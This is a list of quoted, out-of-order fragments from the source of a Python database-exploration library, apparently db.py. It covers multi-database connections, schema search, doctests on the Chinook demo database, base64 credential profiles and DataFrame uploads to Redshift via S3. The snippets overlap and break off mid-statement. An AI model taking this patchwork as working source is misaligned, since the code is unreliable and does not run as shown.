"self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't find psycopg2 library. Please ensure it is", "| | Invoice | CustomerId | INTEGER | | Invoice | BillingAddress |", "col), Column) and getattr(table, col).type not in data_type: continue if isinstance(getattr(table, col), Column):", "with open(\"db/tests/myscript.sql\", \"w\") as f: ... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\",", "| BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns containing", "Exception(\"Sorry, feature only available for redshift.\") try: from boto.s3.connection import S3Connection from boto.s3.key", "20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17", "else: raise Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save your database credentials", "230619 3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051 4 1 Deaffy &", "as either function argument or as an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is", "ArtistId | INTEGER | | Customer | SupportRepId | INTEGER | | Customer", "in a query. This is used by the DB.query method. You can override", "containing trans >>> results = db.find_table(\"*\") # returns everything \"\"\" tables = []", "not configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save your database credentials so you don't", "| INTEGER | | MediaType | MediaTypeId | INTEGER | | Track |", "---------- username: str Your username for the database password: str Your password for", "to say this a secure way to store sensitive data, but it will", "results = db.find_table(\"tmp*\") # returns all tables prefixed w/ tmp >>> results =", "aws secrety key. if this is None, the function will try and grab", "sqlite_master where sql like '%REFERENCES%';\") # find for foreign keys self.cur.execute(\"drop table if", "list) and 'schema_specified' in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema in self.schemas])", "by unittest list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password':", "where sql like '%REFERENCES%';\") # find for foreign keys self.cur.execute(\"drop table if exists", "\"\"\" Pulls your database's schema again and looks for any new tables and", "~/.db.py_{profile_name} and are a base64 encoded JSON file. This is not to say", "else: sys.stderr.write(\"Refreshing schema. Please wait...\") if self.schemas is not None and isinstance(self.schemas, list)", "to store sensitive data, but it will probably stop your little sister from", "is None, the function will try and grab AWS_ACCESS_KEY from your environment variables", "pick up # all of the data*.gz files we've created sys.stderr.write(\"Copying data from", "of tuples if told to use cached metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading", "= self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing schema # 1. load directly from", "import pyodbc as pyo HAS_ODBC = True except ImportError: try: import pypyodbc as", "= True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't find", "Balls to the Wall 2 2 3 Restless and Wild 2 3 4", "for item in query] if union==True: query = \"\\nUNION ALL\".join(query) else: query =", "\"dbname\"]: if getattr(self, arg): value = getattr(self, arg) if arg==\"username\": arg = \"user\"", "+----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns have an \"e\" and are", "Key from boto.s3.connection import Location # if boto is present, set the bucket_location", "= ((self.username and self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password ) )", "for table and column names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table", "str (optional) identifier/name for your database (i.e. \"dw\", \"prod\") from db import DB", "import Column, ColumnSet from .table import Table, TableSet from .s3 import S3 from", ">>> db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns | +--------+--------------------------+ | Album | AlbumId,", "= self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't find", "specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift\") self._query_templates =", "| InvoiceLine | InvoiceId | INTEGER | | MediaType | MediaTypeId | INTEGER", "| Address | NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+", "q, data, union=True): if (sys.version_info < (3, 0)): q = unicode(q) template =", "| | Employee | ReportsTo | INTEGER | | Employee | EmployeeId |", "6 Put The Finger On You 1 1 6 7 Let's Get It", "Those About To Rock (We Salute You) 0.99 1 Balls to the Wall", "in tables: for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) # find for", "{} # generate our Columns, and attach to each table to the table", "to match how normal loading is performed for col in table['columns']: col_meta.append((col['schema'], col['table'],", "row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name,", "('schema', 'name', 'foreign_keys', 'ref_keys')} # col metadata: format as list of tuples, to", "data_type, self.keys_per_column)) return tables def _try_command(self, cmd): try: self.cur.execute(cmd) except Exception as e:", "Rock 1 4 5 Big Ones 3 \"\"\" if data: q = self._apply_handlebars(q,", "schema again and looks for any new tables and columns. \"\"\" col_meta, table_meta", "use the naive approach if use_cache: # generate our Tables, and load them", "print_sql: bool (False) option for printing sql statement that will be executed bucket_location:", "S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\" Utility for exploring and querying a database.", "DemoDB() >>> q = ''' ... SELECT ... a.Title, ... t.Name, ... t.UnitPrice", "hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\" def __init__(self,", "dict for (table_schema, table_name, column_name, data_type) in cols: if table_name not in tables:", "len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def credentials(self): \"\"\"Dict", "columns ending w/ Id +---------------+---------------+---------+ | Table | Column Name | Type |", "use_cache): col_meta = [] table_meta = {} # pull out column metadata for", "None, the function will try and grab AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY:", "database dbname: str Name of the database schemas: list List of schemas to", "self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit,", "of keys to display in the foreign and reference keys. This is used", "Get It Up 1 1 7 8 Inject The Venom 1 1 8", "ImportError: pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\",", "tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column)) return tables def _try_command(self, cmd): try:", "key. if this is None, the function will try and grab AWS_ACCESS_KEY from", "into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master where", "Parameters ---------- q: str Query string to execute data: list, dict Optional argument", "Upload a dataframe to redshift via s3. Parameters ---------- name: str name for", "for data_type: str, list (optional) specify which data type(s) you want to return", "add warnings? try: import psycopg2 as pg HAS_PG = True except ImportError: HAS_PG", "hostname = self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables", "None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is None:", "= multiple-of-slices. Ex: DW1.XL nodes have 2 slices per node, so if running", "raise Exception(\"Could not remove profile {0}! Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\"", "tuples if told to use cached metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached", "profile_path, load_profile, load_from_json, dump_to_json from .query_templates import query_templates # attempt to import the", "Table | Column Name | Type | +---------------+---------------+---------+ | Album | AlbumId |", "StringIO import StringIO # Python 2.7 except: from io import StringIO # Python", "generate our Columns, and attach to each table to the table name in", "1 <NAME>, <NAME>, U. Dirkscneider & W. Ho... 230619 3 1 <NAME>, <NAME>-Diesel,", "use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())])", "that fit into our framework), so we're going to create them. \"\"\" sys.stderr.write(\"Indexing", "for t in sorted(tables.keys())]) # optimize the foreign/ref key query by doing it", "... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ... ] >>> db.query(q, data=data) table_name cnt", "the Dawn 3 2 5 6 Put The Finger On You 1 1", "is None: raise Exception(\"Must specify AWS_SECRET_KEY as either function argument or as an", "s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY", "Name | NVARCHAR(120) | | Track | Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\")", "| MediaType | Name | NVARCHAR(120) | | Playlist | Name | NVARCHAR(120)", "sorted(tables.keys())]) # optimize the foreign/ref key query by doing it one time, database-wide,", "don't need this, but if you're a db admin you might actually want", "hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname self.con = pymssql.connect(host=hostname,", "containing Address +----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+ |", "more info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite') return DB(filename=chinook,", "hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db", "a table. Parameters ----------- search: str glob pattern for what you're looking for", "might actually want to query the system tables. limit: int, None Default number", "transfer s3 bucket. This should match your redshift cluster's region. Examples -------- \"\"\"", "if cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is None: self.load_credentials(profile) if", "\"User Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str)", "DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\" def", "To Rock We Salute You 6 For Those About To Rock We Salute", "We Salute You 1 1 2 Balls to the Wall 2 2 3", "| INTEGER | | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine |", "Wild 0.99 4 Princess of the Dawn 0.99 5 Put The Finger On", "ensure one of them is installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or", "+ chunk_size) k.set_metadata('parent', 'db.py') out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False,", "of the database profiles available Examples -------- No doctest, covered by unittest list_profiles()", "the rendering of PrettyTable a bit. None means that you'll have verrrrrrrry wide", "= hostname self.port = port self.filename = filename self.dbname = dbname self.dbtype =", "key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of the database", "conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with permission on specific buckets can", "set the bucket_location to default. # we can't do this in the function", "tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif not use_cache:", "exclude_system_tables: bool Whether or not to include \"system\" tables (the ones that the", "metadata: format as list of tuples, to match how normal loading is performed", "dbtype self.schemas = schemas self.limit = limit self.keys_per_column = keys_per_column self.driver = driver", "if union==True: query = \"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query) elif isinstance(data, dict):", "| Customer | CustomerId | INTEGER | | Employee | ReportsTo | INTEGER", "returns all columns containing Address +----------+----------------+--------------+ | Table | Column Name | Type", "Track | Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type =", "{{ name }} ... GROUP BY ... table_name ... ''' >>> data =", "for row in foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}',", "take a second...\") rows_to_insert = [] tables = [row[0] for row in self.cur.execute(\"select", "exists chunk_size: int (10000) Number of DataFrame chunks to upload and COPY from", "self.port) else: hostname = self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur =", "\"\"\" Loads crentials for a given profile. Profiles are stored in ~/.db.py_{profile_name} and", "schema for a table. Parameters ----------- search: str glob pattern for what you're", "for db. portgres: 5432 redshift: 5439 mysql: 3306 sqlite: n/a mssql: 1433 filename:", "5 6713451 0.99 6 7636561 0.99 7 6852860 0.99 8 6599424 0.99 9", "getting all key relationships # 3. use the naive approach if use_cache: #", "# generate schema from pandas and then adapt for redshift sql = pd.io.sql.get_schema(df,", "5 1 <NAME>, <NAME>, <NAME> 205662 6 1 <NAME>, <NAME>, <NAME> 233926 7", "k = Key(bucket) k.key = '<KEY>' % (i, i + chunk_size) k.set_metadata('parent', 'db.py')", "str Hostname your database is running on (i.e. \"localhost\", \"10.20.1.248\") port: int Port", "t.AlbumId; ... ''' >>> len(db.query(q)) 3503 db.query(q, limit=10) Title \\ 0 For Those", "sqlite database dbname: str Name of the database schemas: list List of schemas", "pg HAS_PG = True except ImportError: HAS_PG = False try: import MySQLdb mysql_connect", "Shark 0.99 3 Restless and Wild 0.99 4 Princess of the Dawn 0.99", "\"\\n\") self._try_command(sql) # generate schema from pandas and then adapt for redshift sql", "upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k = Key(bucket) k.key =", "bit. None means that you'll have verrrrrrrry wide columns in some cases. driver:", "For Those About To Rock We Salute You 1 Balls to the Wall", "into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t])", "profile return profiles def remove_profile(name, s3=False): \"\"\" Removes a profile from your config", "of: postgres, sqlite, mysql, mssql, or redshift\") self._use_cache = cache if dbtype not", "StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads", "this, but if you're a db admin you might actually want to query", "self.con = pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con = pyo.connect( driver=self.driver or \"SQL", "= '{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname)", "q = unicode(q) template = self.handlebars.compile(q) if isinstance(data, list): query = [template(item) for", "name }} ... GROUP BY ... table_name ... ''' >>> data = [", "NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns ending w/ Id +---------------+---------------+---------+ |", "= DemoDB() >>> q = ''' ... SELECT ... a.Title, ... t.Name, ...", "About To Rock (We Salute You) 0.99 1 Balls to the Wall 0.99", "sys.stderr.write(\"Tearing down bucket...\") for key in bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\")", "a random issue where rows are not in the same order, making doctest", "database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename = None return {", "R.A. Smith-Diesel 375418 5 1 <NAME>, <NAME>, <NAME> 205662 6 1 <NAME>, <NAME>,", "base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con =", "= range(0, len_df, chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)]", "or not \"UNION ALL\" handlebars templates. This will return any handlebars queries as", "Exception(\"Must specify AWS_SECRET_KEY as either function argument or as an environment variable `AWS_SECRET_KEY`\")", "| INTEGER | | Track | Milliseconds | INTEGER | | Track |", "includes things like schema definitions. Most of you probably don't need this, but", "handlebars. union: bool Whether or not \"UNION ALL\" handlebars templates. This will return", "self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or pymysql library.", "| PlaylistId | INTEGER | | PlaylistTrack | TrackId | INTEGER | |", "Bytes \\\\\\r 0 1 <NAME>, <NAME>, <NAME> 343719 11170334 1 1 None 342562", "executing command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name, df,", "postgres, sqlite, mysql, mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\":", "foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False):", "8 9 Snowballed 1 1 9 10 Evil Walks 1 1 GenreId Composer", "plus tables dict representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\"", "{1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an instance of DB that hooks", "6290521 0.99 5 6713451 0.99 6 7636561 0.99 7 6852860 0.99 8 6599424", "into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns'])", "s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY", "self.__str__() def __delete__(self): del self.cur del self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials", "| PlaylistId | INTEGER | | Track | TrackId | INTEGER | |", "Address | NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\",", "load_from_json(f) return prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials, plus the", "Track | GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns containing", "For Those About To Rock We Salute You Name UnitPrice 0 For Those", "Please wait...\") if self.schemas is not None and isinstance(self.schemas, list) and 'schema_specified' in", "'<KEY>' % (i, i + chunk_size) k.set_metadata('parent', 'db.py') out = StringIO() with gzip.GzipFile(fileobj=out,", "for a table. Parameters ----------- search: str glob pattern for what you're looking", "| INTEGER | | InvoiceLine | InvoiceId | INTEGER | | MediaType |", "InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId | INTEGER |", "2 Balls to the Wall 2 2 <BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r", "0.99 1 5510424 0.99 2 3990994 0.99 3 4331779 0.99 4 6290521 0.99", ">>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort in some way for all", "data_type: continue if isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self, q,", "via s3. Parameters ---------- name: str name for your shiny new table df:", "True except ImportError: try: import pymysql mysql_connect = pymysql.connect HAS_MYSQL = True except", "Those About To Rock We Salute You 9 For Those About To Rock", "= load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None) if tables: profile['metadata'] = True else:", "db.find_table(\"tmp*\") # returns all tables prefixed w/ tmp >>> results = db.find_table(\"prod_*\") #", "the bucket sys.stderr.write(\"Tearing down bucket...\") for key in bucket.list(): key.delete() if not s3_bucket:", "have an \"e\" and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table | Column", "name in dict for (table_schema, table_name, column_name, data_type) in cols: if table_name not", "= fp.read() return self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come", "== 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype,", "dbtype not in (\"sqlite\", \"mssql\") and username is None: self.load_credentials(profile) if cache: self._metadata_cache", "executed bucket_location: boto.s3.connection.Location a specific AWS location in which to create the temporary", "Balls to the Wall 2 2 <BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r 0", "database credentials / profile for how you like your queries exclude_system_tables: bool Whether", "e: print (\"Error executing command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def", "in self.tables: for col in vars(table): if glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table,", "type not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift\")", "for mssql/pyodbc connections. Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import", "if isinstance(data, list): query = [template(item) for item in data] query = [str(item)", "told to use cached metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please", "self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the bucket sys.stderr.write(\"Tearing down bucket...\") for key in", "user = os.path.expanduser(\"~\") if s3: f = os.path.join(user, S3_PROFILE_ID + name) else: f", "port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\",", "for col in vars(table): if glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table, col), Column)", "from collections import defaultdict import pandas as pd import pybars from .column import", "profile=\"default\"): \"\"\"Save the database credentials, plus the database properties to your db.py profile.\"\"\"", "6 7 Let's Get It Up 1 1 7 8 Inject The Venom", "TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif", "HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID =", "try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except", "= pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname or '',", "is installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname or", "say this a secure way to store sensitive data, but it will probably", "8 Snowballed 0.99 9 Evil Walks 0.99 >>> template = ''' ... SELECT", "0.99 2 Fast As a Shark 0.99 3 Restless and Wild 0.99 4", "values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master where sql like '%REFERENCES%';\") #", "'{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master where sql like '%REFERENCES%';\") # find for", "faster if chunks = multiple-of-slices. Ex: DW1.XL nodes have 2 slices per node,", "dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from db import DemoDB >>> db", "username: str Your username for the database password: str Your password for the", "JOIN ... Track t ... on a.AlbumId = t.AlbumId; ... ''' >>> with", "True else: profile['metadata'] = False profiles[f[7:]] = profile return profiles def remove_profile(name, s3=False):", "0.99 8 Snowballed 0.99 9 Evil Walks 0.99 \"\"\" with open(filename) as fp:", "return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname)", "ensure it is installed\") if s3 is not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY", "column_name, data_type) in cols: if table_name not in tables: tables[table_name] = [] tables[table_name].append(Column(self.con,", "Cooper style.) keys_per_column: int, None Default number of keys to display in the", "top {limit} * from ({q}) q\".format(limit=limit, q=q) return q def _apply_handlebars(self, q, data,", "DataFrame data frame you want to save to the db drop_if_exists: bool (False)", "raise Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save your database credentials so", "Number of DataFrame chunks to upload and COPY from S3. Upload speed is", "db.find_column(\"Name\") # returns all columns named \"Name\" +-----------+-------------+---------------+ | Table | Column Name", "data=data) table_name cnt 0 Album 347 1 Artist 275 2 Track 3503 >>>", "because we're # lazily importing boto only if necessary here. if bucket_location is", "db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\" Lists all of the database profiles available", "-------- >>> from db import DemoDB >>> db = DemoDB() db.query(\"select * from", "in cols: if table_name not in tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema,", "AWS_ACCESS_KEY as either function argument or as an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY", "location=bucket_location) # we're going to chunk the file into pieces. according to amazon,", "have verrrrrrrry wide columns in some cases. driver: str, None Driver for mssql/pyodbc", "i threads = [] for i in chunks: t = threading.Thread(target=upload_chunk, args=(i, ))", "threads.append(t) # join all threads for t in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists:", "or '', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in self.hostname:", "dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if f: prof =", "Rock We Salute You 1 Balls to the Wall 2 Restless and Wild", "or redshift\") self._use_cache = cache if dbtype not in (\"sqlite\", \"mssql\") and username", "9 1 <NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice 0 11170334 0.99 1 5510424", "down the bucket sys.stderr.write(\"Tearing down bucket...\") for key in bucket.list(): key.delete() if not", "range(0, len_df, chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k", "{} user = os.path.expanduser(\"~\") for f in os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user,", "db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB try: __import__('imp').find_module('psycopg2') db =", "keys_per_column self.driver = driver if self.dbtype is None: raise Exception(\"Database type not specified!", "fp: q = fp.read() return self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite", "---------- profile: str (optional) identifier/name for your database (i.e. \"dw\", \"prod\") \"\"\" f", "& sqlite if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit: q =", "Rock We Salute You 9 For Those About To Rock We Salute You", "(i, i + chunk_size) k.set_metadata('parent', 'db.py') out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as", "k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads = [] for i in chunks: t =", "= df[i:(i+chunk_size)] k = Key(bucket) k.key = '<KEY>' % (i, i + chunk_size)", "1 <NAME>, <NAME>, <NAME> 343719 11170334 1 1 None 342562 5510424 <BLANKLINE> UnitPrice", "| +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns have an \"e\" and", "arg==\"hostname\": arg = \"host\" creds[arg] = value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur =", "raise Exception(\"Couldn't find boto library. Please ensure it is installed\") if s3 is", "and querying a database. Parameters ---------- username: str Your username for the database", "import threading import glob import gzip try: from StringIO import StringIO # Python", "1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit()", "limit=limit) return q # mssql else: if limit: q = \"select top {limit}", "Parameters ----------- search: str glob pattern for what you're looking for Examples ----------", "6 7636561 0.99 7 6852860 0.99 8 6599424 0.99 9 8611245 0.99 >>>", "---------- name: str name for your shiny new table df: DataFrame data frame", "bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe to redshift via s3. Parameters ---------- name:", "in self.cur.execute(\"select name from sqlite_master where type='table';\")] for table in tables: for row", "= DB(profile=\"staging\") >>> from db import DemoDB >>> db = DemoDB() >>> db.save_credentials(profile='test')", "warnings? try: import psycopg2 as pg HAS_PG = True except ImportError: HAS_PG =", "is None: continue for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table,", "records to return in a query. This is used by the DB.query method.", "AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k = Key(bucket) k.key = '<KEY>' % (i, i", "os.path.join(user, DBPY_PROFILE_ID + name) try: try: open(f) except: raise Exception(\"Profile '{0}' does not", "4 Princess of the Dawn 0.99 5 Put The Finger On You 0.99", "so if running 2 nodes you will want chunk_size=4, 8, etc AWS_ACCESS_KEY: str", "self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self, search):", "# 3. use the naive approach if use_cache: # generate our Tables, and", 